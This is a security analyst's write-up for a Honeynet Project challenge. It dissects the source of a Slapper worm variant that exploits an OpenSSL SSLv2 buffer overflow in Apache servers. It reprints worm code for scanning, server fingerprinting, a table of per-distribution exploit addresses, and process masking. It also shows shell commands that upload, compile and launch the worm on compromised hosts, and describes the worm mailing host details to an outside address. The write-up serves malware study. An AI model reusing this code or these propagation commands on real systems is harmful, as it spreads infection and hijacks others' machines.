Honeynet Project Scan of the Month - Scan 25 (November 2002)

Eloy Paris

<peloy at chapus dot net>

Abstract

The Honeynet Project's Scan of the Month for November 2002 requires the analysis of a file obtained from a compromised honeypot. The file turns out to be a gzip-compressed GNU tar archive that contains two C source files. I found out that these files contain the source code for a variant of the Slapper worm that hit the Internet on September 13, 2002 and that exploited the OpenSSL SSLv2 malformed client key remote buffer overflow vulnerability. In this paper I examine how the worm operates, what its capabilities are, and how it propagates and infects other machines.

"The greater the difficulty, the greater the glory" - Cicero

Table of Contents

1. Introduction

2. Initial Inspection

3. Analysis

3.1. Initialization

3.2. Main Loop

3.3. Worm Propagation

3.3.1. The Quest for Vulnerable Hosts
3.3.2. Penetrating Vulnerable Hosts
3.3.3. "You're mine!" a.k.a "You're 0wn3d!" a.k.a "Take this for not patching your machines!"

4. Taming the Worm

5. Questions

5.1. Question 1
5.2. Question 2
5.3. Question 3
5.4. Question 4
5.5. Question 5
5.6. Question 6
5.7. Question 7
5.8. Question 8
5.9. Question 9
5.10. Question 10
5.11. Question 11

A. Files

B. Worm Commands

C. References

D. Thanks

1. Introduction

This is a submission to the Honeynet Project November 2002 Scan of the Month. Here I analyze a variant of the Slapper worm that hit the Net on September 13, 2002 and that exploited the OpenSSL SSLv2 malformed client key remote buffer overflow vulnerability.

The analysis is in some parts very detailed. If you are a grader with lots of submissions to read and can't go over all the details, or are just a casual reader, feel free to go directly to Section 5, which contains the answers to all the questions of this challenge. The questions (and answers) provide a good summary of the most important aspects of the worm. However, just reading the answers is not the best way to understand some of the details or the process I followed to analyze the worm, so I would encourage you to read the whole submission.

2. Initial Inspection

The first thing I need to do after downloading the only file (called .unlock) that the Honeynet Project has given us is to determine what type of file I am dealing with. The easiest way to do this is by running the Unix file command on it:

peloy@canaima:~$ file .unlock
.unlock: gzip compressed data, from Unix

This tells me that the file was compressed using Lempel-Ziv coding (LZ77). Now I can re-run the file command, but this time specifying the -z switch to try to look inside the compressed file:

peloy@canaima:~$ file -z .unlock
.unlock: GNU tar archive (gzip compressed data, from Unix)

The file command is telling me that the compressed file contains a GNU tar archive.
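As a rough illustration of the kind of check the file command performs here, the following C sketch tests a buffer for the gzip magic bytes (0x1f 0x8b) and tests a decompressed header block for the "ustar" magic that tar archives carry at offset 257. The function names are mine and are not taken from file itself, which consults a much larger database of magic numbers.

```c
#include <stddef.h>
#include <string.h>

/* Returns 1 if buf starts with the gzip magic bytes 0x1f 0x8b. */
int looks_like_gzip(const unsigned char *buf, size_t len)
{
    return len >= 2 && buf[0] == 0x1f && buf[1] == 0x8b;
}

/* Returns 1 if buf (the first header block of already decompressed data)
 * carries the "ustar" magic at offset 257. Both the POSIX and the GNU
 * tar formats start their magic field with these five characters. */
int looks_like_tar(const unsigned char *buf, size_t len)
{
    return len >= 262 && memcmp(buf + 257, "ustar", 5) == 0;
}
```

To use it, read the first bytes of the file into a buffer and call looks_like_gzip(); looks_like_tar() only makes sense on the output of the decompressor, not on the compressed file.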

Finally, to find out the date on which the .unlock file was generated (information we will need to answer one of the Scan of the Month questions) I can use the ls command. As we can see below, the .unlock file was created on September 22, 2002 at 1:06 PM (we don't know the time zone).

peloy@canaima:~$ ls -l .unlock
-rw-r--r--    1 peloy    peloy       17973 2002-09-22 13:06 .unlock

With this new information we can now decompress (gzip's -d switch) the file to standard output (gzip's -c switch) and pipe the output to the tar command. We use the tar command's -t switch to list the contents of the archive:

peloy@canaima:~$ gzip -dc .unlock | tar tvf -
-rw-r--r-- root/wheel    70981 2002-09-20 09:28:11 .unlock.c
-rw-r--r-- root/wheel     2792 2002-09-19 17:57:48 .update.c

Bingo! Now we know that we might be dealing with two C source files, one called .unlock.c and the other one called .update.c. We can even see the dates these two files were last modified. To extract the contents of the archive we just need to run the tar command with the -x switch.

3. Analysis

Analyzing this month's Scan of the Month is a lot easier than analyzing previous Scans of the Month and Honeynet Project challenges like Scan 22 and the Reverse Challenge, because this time we are given the actual source code of the program we are concerned with. In the two other challenges I mentioned, the analysis was pretty hard because we were only given the binaries (executable files), so we needed to reconstruct symbol tables and decompile the programs. This took a considerable amount of time, given that the process is highly manual and there are few good tools for reverse-engineering Unix binaries (save Dion Mendel's tools, which I used for Scan 22).

To analyze what the worm does, how it propagates to other machines, how it operates, what capabilities it offers, and other details, I will go over the worm's source code. The format I will use will present a source code segment with callouts to comments that follow the code and that explain different features of the code segment. The number right before the comment is a hyperlink, and clicking on it will take you to the specific line the comment refers to.

Just to provide a general idea, or a 20,000-foot view, the program structure is something like:

main()
{
  initialize();

  while (1) {
     select(timeout=2secs);
     every_60secs_task;
     every_3secs_task;
     every_10mins_task;
     scan_and_infect();
     peer_to_peer_network_housekeeping;
     switch (command) {
        command 1:
          handle_command1;
          break;
        command 2:
          handle_command2;
        udp DoS:
          do_udp_flood;
        tcp DoS:
          do_tcp_flood;
        dns DoS:
          do_dns_flood;
        .
        .
        .
        etc.
     }
  }
}

I'll go over each one of these parts in the next sections.

3.1. Initialization

1768 int main(int argc, char **argv) {
1769         unsigned char a=0,b=0,c=0,d=0;
1770         unsigned long bases,*cpbases;
1771         struct initsrv_rec initrec;
1772         int null=open("/dev/null",O_RDWR);
1773         uptime=time(NULL);
1774         if (argc <= 1) { 
1775                 printf("%s: Exec format error. Binary file not executable.\n",argv[0]);
1776                 return 0;
1777         }
1778         srand(time(NULL)^getpid());
1779         memset((char*)&routes,0,sizeof(struct route_table)*24);
1780         memset(clients,0,sizeof(struct ainst)*CLIENTS*2);
1781         if (audp_listen(&udpserver,PORT) != 0) { 
1782                 printf("Error: %s\n",aerror(&udpserver));
1783                 return 0;

	The first thing the worm does is to check the number of arguments passed to it on the command line. The worm expects at least one argument, so if it is called without arguments it prints a nonsense error message (line 1775) and exits (line 1776).
	The function `audp_listen()` is called to create a socket and bind to UDP port 4156 (the parameter PORT is a symbol defined in line 66 as "4156"). The socket, the port number, and other socket-related information are stored in the global variable `udpserver`, which is declared as struct ainst.
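I have not reproduced the body of audp_listen() here, but the general technique of creating a UDP socket and binding it to a port looks roughly like the following sketch. The function name udp_listen_sketch() is hypothetical, and the worm's own function also records state in its struct ainst, which this sketch does not attempt to model.

```c
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Creates a UDP socket bound to the given port on all interfaces.
 * Returns the socket descriptor, or -1 on failure. */
int udp_listen_sketch(unsigned short port)
{
    struct sockaddr_in addr;
    int sock = socket(AF_INET, SOCK_DGRAM, 0);

    if (sock < 0)
        return -1;

    memset(&addr, 0, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_ANY);  /* listen on every interface */
    addr.sin_port = htons(port);               /* network byte order */

    if (bind(sock, (struct sockaddr *)&addr, sizeof addr) < 0) {
        close(sock);
        return -1;
    }
    return sock;
}
```

Calling udp_listen_sketch(4156) would occupy the same port the worm uses, which is also a quick way to see why a second copy of the worm on the same machine fails at this step.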

In the lines following the call to the audp_listen() function (lines 1785 to 1798) several structures used by the worm are initialized. One interesting structure that is initialized here is the array of IP addresses cpbases, which is initialized with the list of IP addresses that is passed to the worm on the command line:

1789         cpbases=(unsigned long*)malloc(sizeof(unsigned long)*argc); 
1790         if (cpbases == NULL) {
1791                 printf("Insufficient memory\n");
1792                 return 0;
1793         }
1794         for (bases=1;bases<argc;bases++) {
1795                 cpbases[bases-1]=aresolve(argv[bases]); 
1796                 relay(cpbases[bases-1],(char*)&initrec,sizeof(struct initsrv_rec)); 
1797         }

	The worm requests memory to store `argc` IP addresses. If memory is not available the worm exits, printing the error message in line 1791.
	This is where the `cpbases` array is initialized. The function `aresolve()` just resolves a host name and returns the corresponding IP address.
	The function `relay()` is called. It is in this function that the worm generates its first network activity: the worm sends to each IP address or host name passed in the command line a packet that contains the following data: {tag=0x70, len=0, id=0}. As we shall see, this packet just announces the worm to other peers in the network. `relay()` calls `lowsend()`, which in turn does the actual send.

1799         dup2(null,0); dup2(null,1); dup2(null,2); 
1800         if (fork()) return 1;

Here the worm goes daemon. For this it duplicates the file descriptor null, which is associated with /dev/null, as file descriptors 0, 1, and 2, which correspond to standard input, standard output and standard error respectively.

Finally, in the next line (line 1800) the worm forks. If the fork is successful the child continues to run and the parent exits with a return code of 1. If the fork is not successful the worm exits with a return code of 1 as well.
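The two steps just described (silencing the standard descriptors and forking) can be sketched as follows. The helper names are hypothetical. Unlike the worm, this sketch closes the extra /dev/null descriptor once it has been duplicated, and it reports a failure to open /dev/null instead of ignoring it.

```c
#include <fcntl.h>
#include <unistd.h>

/* Points target_fd at /dev/null. Returns 0 on success, -1 on failure. */
int redirect_to_devnull(int target_fd)
{
    int null_fd = open("/dev/null", O_RDWR);

    if (null_fd < 0)
        return -1;
    if (dup2(null_fd, target_fd) < 0) {
        close(null_fd);
        return -1;
    }
    if (null_fd != target_fd)
        close(null_fd);          /* the duplicate keeps /dev/null open */
    return 0;
}

/* Silences stdin, stdout and stderr, then forks.
 * Returns 0 in the child, 1 in the parent or when fork() fails,
 * and -1 if the redirection itself fails. */
int go_daemon_sketch(void)
{
    int fd;

    for (fd = 0; fd <= 2; fd++)
        if (redirect_to_devnull(fd) < 0)
            return -1;
    if (fork() != 0)
        return 1;                /* parent, or fork() returned -1 */
    return 0;                    /* child carries on */
}
```

The `fork() != 0` test mirrors the worm's `if (fork()) return 1;`: a failed fork returns -1, which is also non-zero, so both the parent and the failure case take the same exit path.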

1801 // aion
1802              mailme(argv[1]); zhdr(0); 
1803         for(a=0;argv[0][a]!=0;a++) argv[0][a]=0; 
1804         for(a=0;argv[1][a]!=0;a++) argv[1][a]=0; 
1805         strcpy(argv[0],PSNAME); 
1806
1807         a=classes[rand()%sizeof(classes)]; b=rand(); c=0; d=0; 
1808         signal(SIGCHLD, nas); signal(SIGHUP, nas);

	In line 1802 the worm calls the function `mailme()`, which does the following. It creates a temporary socket and uses it to establish a TCP connection with port 25 (Simple Mail Transfer Protocol) of the host freemail.ukr.net. It then uses this TCP connection to send mail to `<aion@ukr.net>`. The host name used in the HELO SMTP command is test, and the sender used in the MAIL FROM SMTP command is test@microsoft.com. The e-mail does not have any headers, and the body contains the following three lines: "hostid: (decimal number)", "hostname: (string)", and "att_from: (string)". hostid and hostname are obtained via the `gethostid()` and `gethostname()` C library functions, and they refer to the host executing the worm. att_from is the only parameter passed to the `mailme()` function, and represents the first argument passed to the worm on the command line. This argument is an IP address. After the e-mail is sent, the function destroys the socket, which closes the TCP connection.
	Line 1803 just wipes out the string pointed to by argv[0], which is the program name. The name is wiped out by writing zeroes to each byte in the string.
	Line 1804 also wipes a string, but in this case the one pointed to by argv[1], which is the first parameter passed to the worm when it was invoked.
	In line 1805 the worm tries to obfuscate the program name by overwriting argv[0] with the string "httpd ". This way an administrator running the ps command would think that an HTTP server process is running.
	As we will see later, the worm scans other networks to try to find other vulnerable hosts to which it can spread. In line 1807 the worm initializes the first two octets (16 bits) of the IP networks it will scan. It does this by choosing a random entry from the classes[] array for the first octet, and by choosing a completely random value for the second octet.
	Finally, in line 1808 the worm assigns the signal handler `nas()` to signals SIGCHLD and SIGHUP. `nas()` does not do anything so in fact these two signals are ignored if they are received.
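The name-masking trick in lines 1803 to 1805 can be sketched in isolation. The worm's own code uses an unchecked strcpy(), so a replacement name longer than the original argv[0] would write past the end of that string. The hypothetical helper below does the same wipe-and-overwrite but truncates the fake name to the space available; it is an illustration of the technique, not the worm's code.

```c
#include <stddef.h>
#include <string.h>

/* Wipes the NUL-terminated string at argv0 and writes fake_name over it,
 * never touching bytes beyond the original string. Returns the number of
 * characters of fake_name that were stored. */
size_t mask_process_name(char *argv0, const char *fake_name)
{
    size_t room = strlen(argv0);     /* bytes available before the NUL */
    size_t n = strlen(fake_name);

    if (n > room)
        n = room;                    /* truncate instead of overflowing */
    memset(argv0, 0, room);          /* wipe the real name */
    memcpy(argv0, fake_name, n);     /* the original terminator is kept */
    return n;
}
```

From main() this would be called as mask_process_name(argv[0], "httpd "). Whether the new name shows up in process listings depends on how the operating system exposes the argument area.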

Here ends the initialization section of the worm's code. In the next section I will go in detail over the main loop of the worm.

3.2. Main Loop

The main loop begins in line 1809. It is a big "while" loop that never exits. The first thing the worm does inside the main loop is to set a file descriptor set (stored in the variable read, declared as fd_set inside the main loop) so several sockets can be monitored with the select() function call:

1818                 FD_ZERO(&read);
1819                 if (udpserver.sock > 0) FD_SET(udpserver.sock,&read); 
1820                 udpserver.len=0; 
1821                 l=udpserver.sock; 
1822                 for (n=0;n<(CLIENTS*2);n++) if (clients[n].sock > 0) { 
1823                         FD_SET(clients[n].sock,&read);
1824                         clients[n].len=0;
1825                         if (clients[n].sock > l) l=clients[n].sock;
1826                 }
1827                 memset((void*)&tm,0,sizeof(struct timeval));
1828                 tm.tv_sec=2; 
1829                 tm.tv_usec=0;
1830                 l=select(l+1,&read,NULL,NULL,&tm);

	The main socket is added to the file descriptor set.
	The number of bytes read is initialized to zero.
	Same thing for the file descriptors associated with other peers in the network: we add each peer's socket to the set of file descriptors to watch and set the number of bytes read to zero.
	The worm wants to wait two seconds for a change in any of the file descriptors `select()` is watching. Here this timeout is configured.
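The same select() pattern, reduced to a single descriptor, can be sketched as follows. The function name wait_readable() is mine; the worm watches a whole set of sockets at once, but the steps (clear the set, add the descriptor, fill in the timeout, call select() with the highest descriptor plus one) are the same.

```c
#include <stddef.h>
#include <sys/select.h>
#include <sys/time.h>
#include <unistd.h>

/* Waits up to `seconds` for fd to become readable.
 * Returns 1 if fd is readable, 0 on timeout, -1 on error. */
int wait_readable(int fd, long seconds)
{
    fd_set rset;
    struct timeval tv;
    int rc;

    FD_ZERO(&rset);
    FD_SET(fd, &rset);
    tv.tv_sec = seconds;     /* the worm uses 2 here */
    tv.tv_usec = 0;

    rc = select(fd + 1, &rset, NULL, NULL, &tv);
    if (rc < 0)
        return -1;
    return (rc > 0 && FD_ISSET(fd, &rset)) ? 1 : 0;
}
```

Because the timeout is refilled on every call, the loop that wraps it wakes up at least once per timeout period even when no traffic arrives, which is what lets the worm run its periodic tasks.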

After select() is called in line 1830, the worm will execute three pieces of code depending on whether specific time intervals have elapsed. The first piece of code is executed every 60 seconds, the second will be executed every 3 seconds, and the third every 10 minutes.

The code that is executed every 60 seconds is the following:

1849     timeout+=time(NULL)-start;
1850     if (timeout >= 60) {
1851       if (links == NULL || numlinks == 0) {
1852         memset((void*)&initrec,0,sizeof(struct initsrv_rec));
1853         initrec.h.tag=0x70;
1854         initrec.h.len=0;
1855         initrec.h.id=0;
1856         for (i=0;i<bases;i++) relay(cpbases[i],(char*)&initrec,
                 sizeof(struct initsrv_rec)); 
1857       }
1858       else if (!myip) {
1859         memset((void*)&initrec,0,sizeof(struct initsrv_rec));
1860         initrec.h.tag=0x74;
1861         initrec.h.len=0;
1862         initrec.h.id=0;
1863         segment(2,(char*)&initrec,sizeof(struct initsrv_rec)); 
1864       }
1865       timeout=0;
1866     }

If the worm does not know of other peers in the network (that is, if the variable links is NULL or if the variable numlinks is 0) the worm will do the same thing it did in line 1796 (see Section 3.1 above), which is to send a packet with the data {tag=0x70, id=0, len=0} to each of the IP addresses stored in cpbases[].

Note that there is an off-by-one bug in this loop: memory for argc elements was allocated for cpbases[], but the loop in line 1794 starts at 1 and so initializes only the first argc - 1 of them. When that loop ends bases equals argc, so the loop in line 1856 runs from 0 to argc - 1 and reads one element that was never initialized. The result is that there is one extra UDP packet that is sent, but since it goes to 0.0.0.0 it ends up going to the local machine.

If the worm does know of other peers in the network but does not yet know its own IP address (variable myip is zero), the worm will instead send a packet with the data {tag=0x74, id=0, len=0} by calling segment().
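The decision made by the 60-second task in lines 1851 to 1864 can be condensed into a small function. The tag values come from the listing; the macro names and the function name are mine, and the meaning the receiving side attaches to tag 0x74 is not something this sketch tries to capture.

```c
/* Tag values as they appear in lines 1853 and 1860 of the listing.
 * The macro names are hypothetical. */
#define TAG_ANNOUNCE   0x70   /* relayed to the command-line addresses */
#define TAG_IP_UNKNOWN 0x74   /* sent while myip is still zero */

/* Returns the tag the 60-second task would send, or 0 if it sends
 * nothing. have_links is non-zero when links != NULL and numlinks != 0. */
int periodic_tag(int have_links, unsigned long myip)
{
    if (!have_links)
        return TAG_ANNOUNCE;
    if (myip == 0)
        return TAG_IP_UNKNOWN;
    return 0;
}
```

Written this way it is easy to see that the second packet is only ever sent by a worm that already has peers, since the `else if` is reached only when the first test fails.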

The code that is executed every 3 seconds (lines 1869 to 1893) handles the sending of messages in the message queue. This is because the worm maintains a queue of messages to send to other peers it knows about. In some cases the worm just sends the messages immediately but in others messages are just queued for later transmission.

The code that is executed every 10 minutes (lines 1896 to 1900) just sends information about the peer-to-peer network of infected machines from the point of view of the sending machine to a random peer. The work is done by the function broadcast().

In lines 1903 and 1905, the worm just checks if any of the sockets select() is watching has any data, i.e. if data has been received. If there is data these two lines just set the len of the structures the worm uses to keep track of connection state to AREAD.

Next, in line 1907, and extending to line 1938, the worm searches for remote machines it can infect. I go into the details of how the worm does this in Section 3.3.

After worm propagation has been taken care of, the worm seems to do some housekeeping tasks related to the peer-to-peer network. There can be up to 128 peers the worm is in touch with, and from line 1939 to line 2006, the worm performs tasks like adding and deleting peers to and from the internal list that keeps track of all connections. This list is stored in the array clients. I must confess that due to lack of time I did not go into the details of how the peer-to-peer network capabilities of the worm work.

Finally, in line 2008 the last logical section of the main loop is started. This last section will read any command received on UDP port 4156 and process it. One of the features of the worm is that it provides backdoor capabilities that support a variety of tasks. For example, people who know that the worm is executing on a specific machine can request the machine to launch UDP, TCP or DNS Denial of Service attacks against any specific host, can request that the worm run a command on the infected machine, or can request that the worm scan all files in the infected machine and send back a list of all e-mail addresses found, etc.

Appendix B contains a list of the commands the worm understands.

3.3. Worm Propagation

There are three aspects to the propagation of the worm to other machines: 1) search of remote machines to exploit (scanning of remote machines), 2) exploitation of a known vulnerability to get access to the remote host, and 3) replication of the worm to successfully compromised remote machines. I will go over each one of these aspects in the following sections.

3.3.1. The Quest for Vulnerable Hosts

As we shall see, the way the worm scans for other vulnerable hosts is simple. The code that scans remote hosts the worm can exploit begins in line 1907 and extends until line 1938. Here's what the scanning code does:

1907 #ifdef SCAN 
1908     if (myip) for (n=CLIENTS,p=0;n<(CLIENTS*2) && p<100;n++)
                if (clients[n].sock == 0) { 
1909       char srv[256];
1910       if (d == 255) { 
1911         if (c == 255) {
1912           a=classes[rand()%(sizeof classes)];
1913           b=rand();
1914           c=0;
1915         }
1916         else c++;
1917         d=0;
1918       }
1919       else d++;
1920       memset(srv,0,256);
1921       sprintf(srv,"%d.%d.%d.%d",a,b,c,d);
1922       clients[n].ext=time(NULL);
1923       atcp_sync_connect(&clients[n],srv,SCANPORT);
1924       p++;
1925     }
1926     for (n=CLIENTS;n<(CLIENTS*2);n++) if (clients[n].sock != 0) { 
1927       p=atcp_sync_check(&clients[n]);
1928       if (p == ASUCCESS || p == ACONNECT || time(NULL)-((unsigned long)clients[n].ext) >= 5)
                atcp_close(&clients[n]); 
1929       if (p == ASUCCESS) { 
1930         char srv[256];
1931         conv(srv,256,clients[n].in.sin_addr.s_addr);
1932         if (mfork() == 0) {
1933           exploit(srv);
1934           exit(0);
1935         }
1936       }
1937     }
1938 #endif

	All the scanning code is enclosed by a "#ifdef SCAN" construct. My guess is that this was put in place by the author of the worm to make debugging and testing easier. The symbol `SCAN` is obviously defined (in line 59.)
	The worm will scan consecutive IP addresses. The first IP address will have the form `a.b.c.d`, where `a` will be initially randomly set to one value from an array of pre-defined IP networks to scan (see line 291 for the actual declaration of the `classes[]` array), `b` will be set to a random value, and `c` and `d` will be set to zero. After initializing `a.b.c.d` as I just described, the worm will create chunks of 100 TCP sockets and `sockaddr` structures. Each `sockaddr` structure will have the destination IP address set to `a.b.c.d` and the port number set to 80. The creation of the sockets and the initialization of the `sockaddr` structures is actually done by the `atcp_sync_connect()` in line 1923.
	The way the `a.b.c.d` changes is as follows: if both `c` and `d` are equal to 255 it will reinitialize `a.b.c.d` as I described above. If only `d` is 255 then it will increment `c`. If neither `c` nor `d` is 255 then it will just increment `d`.
	Once 100 sockets and `sockaddr` structures have been created/initialized, the worm proceeds to check if the remote host has the port `SCANPORT` open, where `SCANPORT` is a symbol defined in line 67 as 80, the Hyper Text Transfer Protocol (HTTP) port. The function that is called to determine if port 80 of the remote hosts is open is called `atcp_sync_check()`. This function just calls the standard sockets API function `connect()`. The parameters to the `connect()` call are extracted from the previously created sockets and sockaddr structures.
	If it was possible to establish a TCP connection with port 80 of the remote host, the TCP connection is closed by calling the function `atcp_close()`. This is not efficient at all since later on the worm will reconnect to try to exploit the remote host.
	If a specific host is found to have port 80 open, then an exploitation attempt is launched. Before launching an attack the worm forks another instance. This instance performs the attack, handles propagation of the worm if the attack is successful, and then exits. I'll explain the `exploit()` function below.
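The way the target address is stepped in lines 1910 to 1919 can be sketched as a small function. The structure and function names are mine. The sketch leaves the choice of a new `a` and `b` to the caller (the worm picks them from classes[] and rand()) and only signals when that choice is due.

```c
/* The four octets of the address currently being scanned. */
struct scan_addr {
    unsigned char a, b, c, d;
};

/* Advances s to the next address, following the same rules as the worm:
 * bump d; when d wraps, bump c; when both wrap, reset c and d to zero.
 * Returns 1 when the a.b block is exhausted and the caller should pick
 * a fresh a and b, 0 otherwise. */
int next_scan_addr(struct scan_addr *s)
{
    if (s->d == 255) {
        s->d = 0;
        if (s->c == 255) {
            s->c = 0;
            return 1;        /* caller chooses new a and b */
        }
        s->c++;
        return 0;
    }
    s->d++;
    return 0;
}
```

Each `a.b` pair therefore covers 256 x 256 = 65,536 consecutive addresses before a new pair is chosen.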

3.3.2. Penetrating Vulnerable Hosts

The function exploit() is very important because it is the one that launches an exploitation attempt and, if the attack is successful, spreads the worm. The function begins in line 1697. Let's see what this function does (I'll just include the most important parts of it):

1697 void exploit(char *ip) {
1698   int port = 443;
1699   int i;
1700   int arch=-1;
1701   int N = 20;
1702   ssl_conn* ssl1;
1703   ssl_conn* ssl2;
1704   char *a;
1705
1706   alarm(3600);
1707   if ((a=GetAddress(ip)) == NULL) exit(0); 
1708   if (strncmp(a,"Apache",6)) exit(0); 
1709   for (i=0;i<MAX_ARCH;i++) { 
1710     if (strstr(a,architectures[i].apache) && strstr(a,architectures[i].os)) {
1711       arch=i;
1712       break;
1713     }
1714   }
1715   if (arch == -1) arch=9; 
1716
1717   srand(0x31337);
1718
1719   for (i=0; i<N; i++) { 
1720     connect_host(ip, port);
1721     usleep(100000);
1722   }
1723
1724   ssl1 = ssl_connect_host(ip, port); 
1725   ssl2 = ssl_connect_host(ip, port);
1726
[...]
1751
1752   send_client_finished(ssl2);
1753   get_server_error(ssl2);
1754
1755   sh(ssl2->sock); 
1756
1757   close(ssl2->sock);
1758   close(ssl1->sock);
1759
1760   exit(0);
1761 }

The first thing exploit() does is to call the GetAddress() function. GetAddress() in turn establishes a TCP connection with port 80 of the remote host. Once the connection is established, it sends the bogus string "GET / HTTP/1.1\r\n\r\n". It is bogus because HTTP version 1.1 requires a "Host: <hostname>" header after the "GET" request line, and the second "\r\n" pair ends the request before that header is sent. But this doesn't matter because the end goal is to make the remote web server spit out an error message that can be used to identify what the web server software is.

When the remote web server spits the error message, GetAddress() will look for the string "Server: xxxx", and return a pointer to "xxxx". The idea is that exploit() will then decide, based on whether the remote web server is Apache, if it will launch the exploitation attempt. An example of what a remote web server running Apache would return is:

peloy@canaima:~$ nc localhost 80
GET / HTTP/1.1

HTTP/1.1 400 Bad Request
Date: Wed, 27 Nov 2002 05:21:56 GMT
Server: Apache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

If the remote host is not running Apache, the worm gives up and exits (but remember that this is a forked process, and the parent is still running and scanning other hosts).
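The banner handling described above (find "Server: " in the response, then compare the first six characters against "Apache" as line 1708 does) can be sketched like this. The function names are mine, and the sketch works on a response already held in memory instead of reading it from a socket as GetAddress() does.

```c
#include <stddef.h>
#include <string.h>

/* Returns a pointer to the text that follows "Server: " in an HTTP
 * response, or NULL if the header is not present. */
const char *server_banner(const char *response)
{
    const char *p = strstr(response, "Server: ");

    return p ? p + strlen("Server: ") : NULL;
}

/* Returns 1 if the banner begins with "Apache", 0 otherwise. */
int is_apache(const char *banner)
{
    return banner != NULL && strncmp(banner, "Apache", 6) == 0;
}
```

Applied to the 400 Bad Request response shown above, server_banner() would return a pointer to "Apache" followed by the rest of the response, and is_apache() would accept it.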

Here the worm is trying to maximize its chances of success by determining what specific version of Apache, and what Linux distribution, are running on the remote host. By identifying precisely these two the worm can tune one exploit-specific parameter that will improve the chances of success. The different "architectures" the worm knows about are stored in the architectures[] array. There are 23 different combinations of Linux distributions and Apache versions. The Linux distributions are Gentoo, Debian, RedHat, SuSE, Mandrake, and Slackware. Apache versions range from 1.3.6 to 1.3.26. The actual list of architectures is:

   1239 #define MAX_ARCH 21
   1240
   1241 struct archs {
   1242         char *os;
   1243         char *apache;
   1244         int func_addr;
   1245 } architectures[] = {
   1246         {"Gentoo", "", 0x08086c34},
   1247         {"Debian", "1.3.26", 0x080863cc},
   1248         {"Red-Hat", "1.3.6", 0x080707ec},
   1249         {"Red-Hat", "1.3.9", 0x0808ccc4},
   1250         {"Red-Hat", "1.3.12", 0x0808f614},
   1251         {"Red-Hat", "1.3.12", 0x0809251c},
   1252         {"Red-Hat", "1.3.19", 0x0809af8c},
   1253         {"Red-Hat", "1.3.20", 0x080994d4},
   1254         {"Red-Hat", "1.3.26", 0x08161c14},
   1255         {"Red-Hat", "1.3.23", 0x0808528c},
   1256         {"Red-Hat", "1.3.22", 0x0808400c},
   1257         {"SuSE", "1.3.12", 0x0809f54c},
   1258         {"SuSE", "1.3.17", 0x08099984},
   1259         {"SuSE", "1.3.19", 0x08099ec8},
   1260         {"SuSE", "1.3.20", 0x08099da8},
   1261         {"SuSE", "1.3.23", 0x08086168},
   1262         {"SuSE", "1.3.23", 0x080861c8},
   1263         {"Mandrake", "1.3.14", 0x0809d6c4},
   1264         {"Mandrake", "1.3.19", 0x0809ea98},
   1265         {"Mandrake", "1.3.20", 0x0809e97c},
   1266         {"Mandrake", "1.3.23", 0x08086580},
   1267         {"Slackware", "1.3.26", 0x083d37fc},
   1268         {"Slackware", "1.3.26",0x080b2100}
   1269 };

Notice here that if the worm cannot accurately identify a specific architecture, it defaults to entry number 9 of the architectures[] array (counting from zero), which is RedHat and Apache 1.3.23.
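The lookup in lines 1709 to 1715 amounts to a substring match with a fallback. The following sketch isolates that logic; the structure omits the func_addr field, and the function name and parameters are hypothetical.

```c
#include <stddef.h>
#include <string.h>

/* One row of the table: distribution name and Apache version string. */
struct arch_entry {
    const char *os;
    const char *apache;
};

/* Returns the index of the first entry whose os and apache strings both
 * occur somewhere in the banner, or `fallback` if none matches. */
int pick_arch(const char *banner, const struct arch_entry *table,
              int count, int fallback)
{
    int i;

    for (i = 0; i < count; i++)
        if (strstr(banner, table[i].apache) && strstr(banner, table[i].os))
            return i;
    return fallback;
}
```

Note that an empty version string, as in the Gentoo row of the listing, matches any banner, so that row is selected on the distribution name alone. With a table holding the first rows of the listing, a made-up banner such as "Apache/1.3.26 (Unix) Debian GNU/Linux" selects the Debian row, while a bare "Apache" falls through to the fallback index.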

Here the worm is getting into exploit-specific territory: the worm exploits the vulnerability of OpenSSL that was announced by the CERT/CC on July 30, 2002 (see the references in Appendix C for links to online documents that contain more details). So, the worm needs to connect to port 443 (HTTPS) to be able to exploit the vulnerability. What the worm is doing here is attempting to open a connection to port 443 of the remote host. It does this 20 times, pausing 100 milliseconds between attempts. Inside the function connect_host() we can see that if the connection fails, the worm will exit.

Between lines 1724 and 1753 is where the actual exploitation of the OpenSSL vulnerability takes place. I won't go into details here because this is better explained elsewhere (again, please refer to Appendix C for links to online documents that explain well the details of this vulnerability).

Finally, here the remote host has been compromised! The worm is in and now it is time to perpetuate the species! The function sh() is responsible for propagating the worm to the compromised machine. I will explain what this function does in the next section.

3.3.3. "You're mine!" a.k.a "You're 0wn3d!" a.k.a "Take this for not patching your machines!"

Once a vulnerable host has been successfully compromised it is time for the worm to preserve the species. Worm propagation is done by the sh() function, which is called after the OpenSSL attack has been successful. At this point, the worm has an open shell in the remote host, and is ready to start sending the commands that will propagate the worm. Let's see what it does in detail:

1403 int sh(int sockfd) {
1404   char localip[256], rcv[1024];
1405   fd_set rset;
1406   int maxfd, n;
1407
1408   alarm(3600);
1409   conv(localip,256,myip); memset(rcv,0,1024);
1410 // aion
1411   writem(sockfd,"export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null;"
1412     "export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;"
1413     "exec bash -i\n");
1414   writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
1415                 "       /tmp/httpd /tmp/update /tmp/.unlock;\n"); 
1416   writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n"); 
1417   zhdr(1);
1418   encode(sockfd); 
1419   zhdr(0);  
1420   writem(sockfd,"__eof__\n"); 
1421   writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu;   "
1422                 "tar xzf /tmp/.unlock -C /tmp/;              "
1423     "gcc -o /tmp/httpd  /tmp/.unlock.c -lcrypto; "
1424     "gcc -o /tmp/update /tmp/.update.c;\n"); 
1425   sprintf(rcv,  "/tmp/httpd %s; /tmp/update; \n",localip); 
1426   writem(sockfd,rcv); sleep(3);
1427   writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
1428                 "       /tmp/httpd /tmp/update; exit; \n"); 
1429   for (;;) {
1430     FD_ZERO(&rset);
1431     FD_SET(sockfd, &rset);
1432     select(sockfd+1, &rset, NULL, NULL, NULL);
